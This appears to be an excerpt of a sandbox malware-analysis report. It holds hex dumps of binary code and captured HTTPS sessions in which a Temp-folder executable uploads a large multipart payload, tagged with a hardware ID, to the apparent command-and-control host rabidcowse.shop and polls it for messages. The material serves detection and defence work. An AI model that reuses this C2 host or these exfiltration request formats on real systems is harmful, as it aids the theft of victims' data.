                                                                                                                                                                                                                                                  Data Ascii: HHP%HH8_^][HL$HT$LD$LL$ SUVWAV@H+HH3H$0HL$xH|$03+DLHHL$0HD$ xHcH|$0H+IHcLt$(LLHD$ HHH%"LJD$ LSH
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: 5b c3 cc cc 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 41 54 41 55 41 56 41 57 b8 58 20 00 00 e8 50 9c 00 00 48 2b e0 48 8b 05 c6 b3 03 00 48 33 c4 48 89 84 24 40 20 00 00 45 33 ed 48 8d 74 24 40 41 8b ed 4d 8b f8 44 8b e2 4c 8b f1 bf 00 10 00 00 e8 cd 25 01 00 44 8b c8 4c 8d 05 d3 8f 02 00 8b d7 48 8d 4c 24 40 e8 f7 f9 ff ff 85 c0 78 18 48 63 c8 48 8d 74 24 40 8b e8 48 8d 34 4e 8b cf 2b c8 41 8b fd 0f 49 f9 48 63 df e8 63 e3 ff ff 4d 8b cf 4c 8b c3 48 8b d6 48 8b 08 48 8d 84 24 b8 20 00 00 48 89 44 24 28 48 83 c9 01 4c 89 6c 24 20 e8 44 1f 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 85 c0 78 0d 48 63 c8 2b f8 41 0f 48 fd 48 8d 34 4e 48 63 d7 4c 8d 05 77 8f 02 00 4d 8b ce 48 8b ce e8 7c f9 ff ff 85 c0 78 0d 48 63 c8 2b f8 41 0f 48 fd 48 8d 34 4e 4c 89 6c 24 30 41
                                                                                                                                                                                                                                                  Data Ascii: [LD$LL$ SUVWATAUAVAWX PH+HH3H$@ E3Ht$@AMDL%DLHL$@xHcHt$@H4N+AIHccMLHHH$ HD$(HLl$ DHxHc+AHH4NHcLwMH|xHc+AHH4NLl$0A
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: ff ff 48 8b d8 48 3b 86 10 10 00 00 0f 82 f0 fe ff ff 33 c0 48 8b 9c 24 98 10 00 00 48 8b bc 24 a8 10 00 00 48 8b ac 24 a0 10 00 00 4c 8b b4 24 60 10 00 00 4c 8b a4 24 68 10 00 00 48 8b 8c 24 50 10 00 00 48 33 cc e8 c6 93 00 00 48 81 c4 70 10 00 00 41 5f 41 5d 5e c3 48 8b 05 f2 eb 03 00 4c 8d 44 24 38 48 8d 54 24 30 48 8d 4c 24 40 ff 15 8d 82 02 00 48 8b 05 de eb 03 00 4c 8d 44 24 38 48 8d 54 24 30 48 8d 4c 24 40 ff 15 71 82 02 00 48 8b 4c 24 30 33 f6 48 8b 05 33 ec 03 00 ff 15 5d 82 02 00 48 8b f8 48 8b c8 48 8b 05 50 ec 03 00 ff 15 4a 82 02 00 48 85 c0 74 0b 48 8b c8 e8 01 72 01 00 48 8b f0 48 8b 05 13 eb 03 00 48 8b cf ff 15 2a 82 02 00 41 80 bd 78 30 00 00 00 74 0e 48 8d 0d c1 8c 02 00 e8 d8 71 01 00 eb 1a 4c 8b 44 24 38 41 b9 02 00 00 00 48 8b 54 24
                                                                                                                                                                                                                                                  Data Ascii: HH;3H$H$H$L$`L$hH$PH3HpA_A]^HLD$8HT$0HL$@HLD$8HT$0HL$@qHL$03H3]HHHPJHtHrHHH*Ax0tHqLD$8AHT$
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: 48 8d 4c 24 20 e8 d6 5b 00 00 48 8d 4c 24 20 85 c0 74 5a 48 8d 94 24 20 20 00 00 e8 40 5c 00 00 85 c0 79 18 48 8d 54 24 20 48 8d 0d 60 8c 02 00 e8 cb f0 ff ff b8 ff ff ff ff eb 59 41 b8 04 00 00 00 48 8d 94 24 20 20 00 00 48 8d 0d 9f 8c 02 00 e8 12 1b 01 00 33 d2 b9 08 00 00 00 85 c0 48 8d 84 24 20 20 00 00 0f 45 ca 48 03 c8 41 b8 00 10 00 00 48 8b d3 e8 25 5d 00 00 48 85 c0 75 13 48 8d 0d 79 8c 02 00 e8 74 f0 ff ff b8 ff ff ff ff eb 02 33 c0 48 8b 8c 24 20 40 00 00 48 33 cc e8 0b 8e 00 00 48 81 c4 30 40 00 00 5b c3 cc cc 40 55 57 41 54 b8 80 20 00 00 e8 f1 90 00 00 48 2b e0 48 8b 05 67 a8 03 00 48 33 c4 48 89 84 24 60 20 00 00 48 8b f9 b9 02 00 00 00 e8 6f 1c 01 00 48 8b c8 33 d2 e8 f9 1c 01 00 48 8d 4f 10 e8 ac fe ff ff 85 c0 79 0c 48 c7 c0 ff ff ff ff
                                                                                                                                                                                                                                                  Data Ascii: HL$ [HL$ tZH$ @\yHT$ H`YAH$ H3H$ EHAH%]HuHyt3H$ @H3H0@[@UWAT H+HgH3H$` HoH3HOyH
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: 24 b8 20 00 00 4c 8b bc 24 70 20 00 00 48 8b b4 24 b0 20 00 00 4c 8b b4 24 78 20 00 00 48 8b 9c 24 a8 20 00 00 48 8b 8c 24 60 20 00 00 48 33 cc e8 19 89 00 00 48 81 c4 80 20 00 00 41 5c 5f 5d c3 48 8b cf e8 95 4b 00 00 85 c0 79 09 48 8d 0d f2 83 02 00 eb a0 48 8d 9f 22 20 00 00 e9 b3 00 00 00 48 8d 0d ed 82 02 00 e8 40 4d 00 00 48 8b f0 48 85 c0 74 4d 80 38 00 74 48 48 8d 9f 22 20 00 00 4c 8b c8 48 8b cb 4c 8d 05 7b 7d 02 00 ba 00 10 00 00 e8 75 df ff ff 3d 00 10 00 00 7c 19 48 8d 0d 07 84 02 00 e8 f2 e9 ff ff 48 8b ce e8 7a 12 01 00 e9 42 ff ff ff 48 8b ce e8 6d 12 01 00 eb 52 48 8d 0d a4 83 02 00 e9 27 ff ff ff 48 8d 57 10 48 8d 4c 24 60 e8 81 07 00 00 4c 8b 87 70 30 00 00 48 8d 9f 22 20 00 00 48 8b cb 4d 85 c0 74 0c 48 8d 54 24 60 e8 b1 08 00 00 eb 16
                                                                                                                                                                                                                                                  Data Ascii: $ L$p H$ L$x H$ H$` H3H A\_]HKyHH" H@MHHtM8tHH" LHL{}u=|HHzBHmRH'HWHL$`Lp0H" HMtHT$`


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  25192.168.2.449988172.67.156.1274437144C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=05AQNJ0KDHPLM0OE
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 568791
                                                                                                                                                                                                                                                  Host: rabidcowse.shop
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: 2d 2d 30 35 41 51 4e 4a 30 4b 44 48 50 4c 4d 30 4f 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 30 35 41 51 4e 4a 30 4b 44 48 50 4c 4d 30 4f 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 35 41 51 4e 4a 30 4b 44 48 50 4c 4d 30 4f 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 44 56 78 34 49 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d
                                                                                                                                                                                                                                                  Data Ascii: --05AQNJ0KDHPLM0OEContent-Disposition: form-data; name="hwid"F9C89AE3A748EEF120A4C476FD51BCB1--05AQNJ0KDHPLM0OEContent-Disposition: form-data; name="pid"1--05AQNJ0KDHPLM0OEContent-Disposition: form-data; name="lid"7DVx4I--installs-
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: 44 fb 39 0b a3 18 5f 67 1f 8f 3f 0d 3f 54 d4 f3 b2 cb f7 57 5f b1 fb 4c 47 7c 05 06 a4 98 13 00 df 06 cf 62 1e 7e 63 e7 51 be d9 88 c3 df 60 71 c6 e5 ff 33 02 c8 43 2a f0 c8 6f 43 70 3f 88 33 a4 e6 fa 01 66 2e 1f 38 0d 07 44 86 e0 b8 47 65 6b 1d fc 66 f6 63 36 14 43 56 8a 79 51 be f4 d9 b5 94 df 79 53 2d 23 10 b4 97 6f cf 59 eb 03 ad 6d 97 bc 9f c7 79 3d af 16 f1 f4 c0 11 da c4 9b a3 35 1a b8 1c f7 9a 64 b5 fc cb 3f f0 03 61 92 e8 d6 fb 14 e6 22 7b e6 cb 5f db da b1 94 f2 38 05 f3 bc 6f b8 33 9a e9 8d 3e ca a0 f3 09 3d f0 bd 72 ad 92 48 18 db cc 79 77 69 d0 aa 69 27 bf 07 4d 39 19 62 92 b2 7c b5 7d f1 6f 31 1c 91 a0 7a 13 b1 30 21 71 5b 33 7a d4 54 2e ab 3f 0c 91 37 b9 7c 1d 6c 73 be 5b da 7f 95 af ee e3 cf 01 49 4b 23 cc 89 d3 ce bb 9e a4 a2 fe 43 b1 75
                                                                                                                                                                                                                                                  Data Ascii: D9_g??TW_LG|b~cQ`q3C*oCp?3f.8DGekfc6CVyQyS-#oYmy=5d?a"{_8o3>=rHywii'M9b|}o1z0!q[3zT.?7|ls[IK#Cu
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: 29 25 b7 ba ab aa dc 3d fa 59 f1 b8 8c a6 cb a6 f1 47 6d 6c e0 e5 c2 ee e0 24 7c b0 97 68 b9 c3 57 7a fd 57 ff eb 6f 6d aa dc 23 6a 6a 0a 25 c1 50 71 88 29 c4 98 cd c5 83 6d 3b fe d5 62 a9 75 11 88 41 fa ef c8 f5 f9 97 20 69 e6 bf 43 ac 73 b3 35 bc 01 8d 84 04 10 a7 c8 ff d7 a0 69 a9 fe 3e 51 13 88 80 c3 18 de c9 3d bb fb 80 f4 7e 9a 2a 02 c7 d7 af ef 93 6d 94 49 86 aa 57 77 d6 f5 cb 55 4a 81 c5 c6 1b 90 af e8 b3 f4 e3 6a a2 ed 1f d1 57 b2 ef f3 f6 fc 05 14 c1 b8 7a c2 cf e3 7f da 0a 22 eb 90 03 2d de fa 83 20 05 97 19 e3 d3 a3 10 2d 1c 1d 00 1f 5b 50 29 e2 c8 af eb 6a 78 e2 ae 1a 30 09 bb 09 0f 38 41 44 f0 61 2a e2 35 a9 40 cb 23 77 6f 83 ce 96 fc 29 52 f1 7c ed 1a be d4 24 bd 27 15 31 52 42 e6 32 61 25 60 ef 00 8b 98 b8 8f e4 cd 29 60 46 20 81 ec d5 e3
                                                                                                                                                                                                                                                  Data Ascii: )%=YGml$|hWzWom#jj%Pq)m;buA iCs5i>Q=~*mIWwUJjWz"- -[P)jx08ADa*5@#wo)R|$'1RB2a%`)`F
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: df 7d 8b 7e 89 66 82 40 f4 ee ff 7c f0 5e 96 fd b9 b2 fd 63 65 c5 cb 9a 4c 24 0e 11 6e a1 6f 1f 27 df c8 4d 03 74 35 22 95 86 26 f3 a3 78 95 80 07 16 bb 7e 4c c3 52 05 ef 94 63 82 05 4f a1 70 c4 01 ae e1 c1 41 9c 47 89 ca 8b 59 f6 43 93 8f 3c b0 f3 e4 db 37 af ff d0 75 b3 9c 1f 42 8f 74 5e 9c 03 c4 2b 10 51 61 28 1f 05 5c db 0a 9e 3c 81 4b 41 bd fe 7f a7 d6 da 5c b0 56 6f df af 37 68 db 85 eb d7 63 91 77 66 ab 7d 79 cd 8a 4f b9 55 7b 61 bc 78 57 e4 17 8a b3 44 fd 2c bd 1a 02 12 71 90 db e4 de 75 2b 9e 00 79 e0 fc 7d 8e 14 51 83 1b 8a 2b 45 ed ca db a5 87 fd 2e 21 f0 1a 4d ef 14 20 eb b2 d4 57 84 2c 6a 49 a9 a2 38 11 f0 46 54 dd 12 64 36 84 b8 02 c2 50 c1 dc b0 9c d8 48 b5 d6 33 86 be 90 fa 3f 11 2f 0e 91 5a 00 66 11 cd 8e d3 43 ed 04 07 17 7f ba a7 a3 d7
                                                                                                                                                                                                                                                  Data Ascii: }~f@|^ceL$no'Mt5"&x~LRcOpAGYC<7uBt^+Qa(\<KA\Vo7hcwf}yOU{axWD,qu+y}Q+E.!M W,jI8FTd6PH3?/ZfC
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: d2 e5 e0 58 60 11 70 27 d2 4b 34 34 b9 49 99 c9 88 69 64 95 3c 70 99 2f bf f4 40 82 53 08 ea 1f c1 44 7c f3 88 10 ca b8 82 03 38 04 9e bd 12 98 d5 e7 56 04 02 a1 8d d0 42 86 3f 0c ea 87 46 46 06 c2 61 7e eb 1a bd fc 0c 8b a6 c6 40 ba 39 ed f7 09 b2 e9 d1 e3 e1 19 11 da 15 5c 15 6f 84 c2 ea 5b 25 6b b2 55 c0 99 49 79 88 e8 c6 b7 3c 80 c4 23 02 a5 6f f9 9a f8 6b 18 b6 45 6a ae 55 fa dc 24 4d 34 1f 90 14 9e 70 32 d6 e7 4e 61 ce 4c 5e dc bf 9e 3b a4 8e 19 0e 7c 34 38 1c 7c 6c 41 b9 bb 88 d1 aa 2d 66 a7 2d d5 bc 10 cc b8 76 9c 2c b6 fe 5a d3 76 58 be 75 51 d2 be 3e 4c 43 b4 ad 9c 13 c6 4d 11 14 18 09 c2 80 60 0c 8c b1 0d fa 77 09 d0 47 16 8c c4 80 6d 34 ad ea 5c b1 53 0c 26 1c 91 6e 11 a2 ef 65 d7 4c fd 24 34 2e 55 f0 3a e7 6d 3c da fe bc 00 73 55 f8 a0 5d a8
                                                                                                                                                                                                                                                  Data Ascii: X`p'K44Iid<p/@SD|8VB?FFa~@9\o[%kUIy<#okEjU$M4p2NaL^;|48|lA-f-v,ZvXuQ>LCM`wGm4\S&neL$4.U:m<sU]
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: a8 e4 da ac 47 bd b4 08 94 1c 8b bb 0c ae 8e 26 a2 5a 49 17 4f 4f 66 69 e0 a1 b9 98 71 eb dc ba 08 9e 4b 58 0a 5b eb 02 dd 1c 42 c2 33 92 1f 5f 89 f7 45 52 0d 10 58 23 15 bf 6e 19 32 bf ba ac 5b 30 86 94 40 84 6a 3f 9f 00 31 dc d3 05 99 a4 f3 30 f2 f9 2e 1c ec f2 a8 1e 30 53 f1 91 e5 ed 26 07 49 e7 00 fb fd 6c 71 d6 12 48 6d a3 54 ac 05 ce 82 d3 60 ca 5d 51 0c 68 5e 31 a5 ee 80 8d 41 ad cc ca 81 07 ca 77 37 07 74 31 44 54 85 9a 8c 7b 5e 2f c2 64 53 c6 58 b7 ca ce 02 f9 3f 28 60 4e da b4 a6 8d 14 b4 ef 3a c2 83 36 07 25 54 42 b4 09 43 73 1c 30 8c 87 5b 90 c0 f2 11 dc 25 0a 76 97 2d 0b d3 db 8d 7b c5 41 d9 e6 ed bd 01 28 a0 c1 7e a2 89 a8 2c d4 2a 22 44 cf e9 94 64 40 7d 07 c7 8b 55 c1 69 86 fb 87 8d f5 c3 8e 83 1b 4d 1f 52 0e 8f b3 1f 55 a6 a8 28 53 b3 0c
                                                                                                                                                                                                                                                  Data Ascii: G&ZIOOfiqKX[B3_ERX#n2[0@j?10.0S&IlqHmT`]Qh^1Aw7t1DT{^/dSX?(`N:6%TBCs0[%v-{A(~,*"Dd@}UiMRU(S
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: b2 45 87 de 4a 03 df f4 6a 4b d8 92 d4 7a 40 90 e3 85 28 f8 b9 38 5a 0e aa d6 e8 6d 96 54 dc ce f4 a6 c5 16 59 f8 d1 84 0b 4c 69 c3 36 45 70 07 25 c1 a1 b9 87 80 74 73 6a da ee e9 5b 97 eb 8e 2b ca 94 37 ea 6a 80 6e 9e 20 fc ce 63 f4 34 9a fe 76 63 d4 32 b7 bf 77 8c ff bb 2d f4 45 9d 70 9d 33 44 66 64 05 f0 df 33 37 ec 47 92 16 f9 f9 3e c2 f4 79 eb f0 3d 05 43 dc bf 70 bc e3 ba 80 1d a3 8c f8 09 f1 a9 5e 41 b6 2d 60 7f 97 25 02 8d 8e dc 3d 24 7e c6 61 ae 34 ab 4b 0d 55 43 69 81 fa e4 c1 a1 8f b8 a4 83 5e 86 da 3d 8a 7d 8e 65 3b 42 cf c8 92 fa 26 70 e9 75 ba 9d 5f 39 43 e5 07 23 91 96 63 98 aa 07 a4 e7 ac 9f 56 57 1a 48 d3 b8 fc ed 1a c3 23 48 26 89 c2 0a f7 40 68 37 51 21 14 11 05 4e 0c 8a dd ba 6b 31 7e 54 e4 90 f8 d1 d5 67 f3 0d a1 0a 24 af 26 ed 12 13
                                                                                                                                                                                                                                                  Data Ascii: EJjKz@(8ZmTYLi6Ep%tsj[+7jn c4vc2w-Ep3Dfd37G>y=Cp^A-`%=$~a4KUCi^=}e;B&pu_9C#cVWH#H&@h7Q!Nk1~Tg$&
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: 33 75 50 0a 52 99 61 ae b8 d4 7e 41 4f 5f 45 51 e5 be f2 33 a4 0d b2 cf 60 38 46 46 b7 ff 44 18 bd d6 f5 91 d9 4e 06 51 00 94 97 8e 97 97 1b 78 c5 01 7c f0 82 76 7d b8 b4 a3 1f 67 2a e3 32 20 f4 fb 05 a7 bb 19 7f d6 6d af 6b 37 2a 5e cf 50 e1 ca 9c 23 e9 6f d9 5b 2e 6a 5d a5 71 83 3f 04 8b 6e b5 72 f9 ce b1 b5 63 e6 90 94 cc 4a 95 4d 7b 76 fa a4 ad f7 55 a0 4f 4b 3f 9a d1 1a 9a 4f 53 e7 26 04 ef 4a 9f b2 81 e3 e0 bf 29 fd df 7a 06 6f 1a 02 42 01 d4 83 97 34 b6 e1 08 07 3b 7f 5b 1b ff 40 cf 0e da 78 5d 10 b4 35 76 92 53 c5 3c b8 83 7c 2c bf 8b cd e9 35 16 88 51 ca 1c 7c 2f 07 b4 8e d0 ae 7f 4e cb 55 6c b9 1d a0 fd 38 fc f3 1d e3 5b 5a 60 ba 24 aa 01 51 e9 7d e2 48 10 26 ca 5a 00 dc 42 a1 79 97 4e 39 13 26 45 87 5d a5 64 76 d5 e5 7b 75 4b fd 4d f2 94 1a 13
                                                                                                                                                                                                                                                  Data Ascii: 3uPRa~AO_EQ3`8FFDNQx|v}g*2 mk7*^P#o[.j]q?nrcJM{vUOK?OS&J)zoB4;[@x]5vS<|,5Q|/NUl8[Z`$Q}H&ZByN9&E]dv{uKM
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: 86 75 6e 2d 19 01 5f 58 cd 02 f8 79 4b 05 9a aa 2e 02 62 9f f5 05 3c 15 51 ea 52 81 d0 d8 f3 8e 55 2f 8b 3b 6c 08 d7 b7 10 f7 1c e4 8e f9 82 7a 75 46 df 42 cc 7a 18 4c 83 43 2f 2c 86 ab f4 c1 87 65 5b 26 a8 54 ec ac 3f 0d 15 86 83 24 51 e7 57 2b 75 8e 84 c9 6c 8d 06 96 0d 70 6b 74 47 12 09 1d 6d 88 4b bd 85 7e 7c 17 85 40 52 9b 49 e3 ed 75 63 a7 a6 c0 54 99 3d c5 28 b3 7b 16 c2 1b 12 ab 7b a5 df 15 10 bd 44 85 b5 ac fa c2 a2 c2 26 71 ef cc db 30 47 dc b4 ae 60 ce 43 b1 8b 57 5c 22 8c 79 55 fa dd 2c bd 4c 47 73 09 fe dc 7e 18 e1 31 9d 1c cf e8 ae df ac dd 3b c1 73 ec 8a a9 30 2a 94 ba 3e 33 44 df 0d 2b cd f2 ea 94 62 cb d2 a7 dd b4 33 00 8e 0a 33 5b f3 86 af eb 4d 64 07 c4 6f 5a e9 b6 67 33 a4 38 57 0d a8 d7 da 08 5d 3d 6c 8f a3 58 5d 85 cb aa 7a e0 92 76
                                                                                                                                                                                                                                                  Data Ascii: un-_XyK.b<QRU/;lzuFBzLC/,e[&T?$QW+ulpktGmK~|@RIucT=({{D&q0G`CW\"yU,LGs~1;s0*>3D+b33[MdoZg38W]=lX]zv
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC15331OUTData Raw: 5e ef fa 46 a2 d6 5f cd ad b7 e7 03 3a a2 05 df 18 2f 0f 8e c8 81 77 32 7a 48 f0 b4 4f 34 dd 3c e4 c7 76 cb fe 64 93 ab 5b 3f 9e 09 6b 80 93 eb 76 ea fc 9f 01 8e ab 95 b0 44 5c 21 2f d0 59 bb ed 75 eb ae f3 51 ea 0f 24 da af f6 d6 bb 24 39 f0 5b ee 94 2e ee 79 9d 38 84 e3 aa 04 54 49 df fc a8 92 f0 16 43 b4 ad 41 61 07 95 77 a3 8f ed 35 82 1d 21 d9 2a 70 b8 fe 7a 5a 98 9b 4a e3 6e 13 de d3 a3 ef 3a f1 79 51 43 31 f3 57 cd d2 3a c4 6f 11 85 3e 3b 50 bb 92 43 07 ee c8 6d d8 5f 5b fb 28 82 e7 be a0 8b d2 30 86 87 04 95 14 13 2c b3 05 5f 1f d5 fa 14 fd 66 93 7d a4 d8 03 ca 76 f2 52 97 f6 a2 52 5c b0 73 e3 c5 c2 77 9d 9b 23 79 59 18 8e 9b 99 f4 34 06 c2 cd b9 36 63 c7 d7 de d6 44 1f c1 ea b7 72 3b 9d 0c 14 d7 6a e3 48 55 7c f8 c4 60 0d bd 36 b1 39 1a 61 d8 e4
                                                                                                                                                                                                                                                  Data Ascii: ^F_:/w2zHO4<vd[?kvD\!/YuQ$$9[.y8TICAaw5!*pzZJn:yQC1W:o>;PCm_[(0,_f}vRR\sw#yY46cDr;jHU|`69a
                                                                                                                                                                                                                                                  2025-01-03 08:50:32 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:31 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=mlesn73760e6735pe0n3ipj7ne; expires=Tue, 29 Apr 2025 02:37:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okcKweIZ9U2W1zo5zau1mLBTdkD7RhTbwyKccTxYflWPmmcz7WQYkEvdPbLcCita4e4gJMDUf8J7zAybYMnp%2B0fH5EctgT20ORCQIpPyyDLLrvDvZVACUu%2FdFMCX6IbOtgg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bddcdba08ce9-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2019&rtt_var=761&sent=198&recv=588&lost=0&retrans=0&sent_bytes=2835&recv_bytes=571335&delivery_rate=1434889&cwnd=231&unsent_bytes=0&cid=c3fd0c5240ab9ee0&ts=1576&x=0"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  26192.168.2.450004172.67.156.1274437144C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:32 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 85
                                                                                                                                                                                                                                                  Host: rabidcowse.shop
                                                                                                                                                                                                                                                  2025-01-03 08:50:32 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 37 44 56 78 34 49 2d 2d 69 6e 73 74 61 6c 6c 73 26 6a 3d 26 68 77 69 64 3d 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31
                                                                                                                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=7DVx4I--installs&j=&hwid=F9C89AE3A748EEF120A4C476FD51BCB1
                                                                                                                                                                                                                                                  2025-01-03 08:50:32 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:32 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=nlseri4abiaqb1m52bfo2290ig; expires=Tue, 29 Apr 2025 02:37:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Db1XIeF8f46p%2BpDq1dpFx3XX1JKobuifnhWqj90F3s99VKCJG%2BK7ni2keCcMWTz4vOZ8%2F4xs8DuNe2u7EWWWdxiB0LrSlt7Kkkn%2BBGMSkVv5EKTLV6jo1R0uBekieqrgAVc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bde9ad6a42c6-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1595&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=984&delivery_rate=1830721&cwnd=151&unsent_bytes=0&cid=d90ea2d951d9135d&ts=500&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:32 UTC54INData Raw: 33 30 0d 0a 5a 36 77 74 67 53 37 35 73 53 7a 4d 50 55 50 74 36 64 68 67 58 2f 4f 33 49 35 65 32 46 71 78 34 59 58 30 44 52 44 45 71 73 6d 73 38 38 51 3d 3d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 30Z6wtgS75sSzMPUPt6dhgX/O3I5e2Fqx4YX0DRDEqsms88Q==
                                                                                                                                                                                                                                                  2025-01-03 08:50:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  27192.168.2.450072142.250.185.164443796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
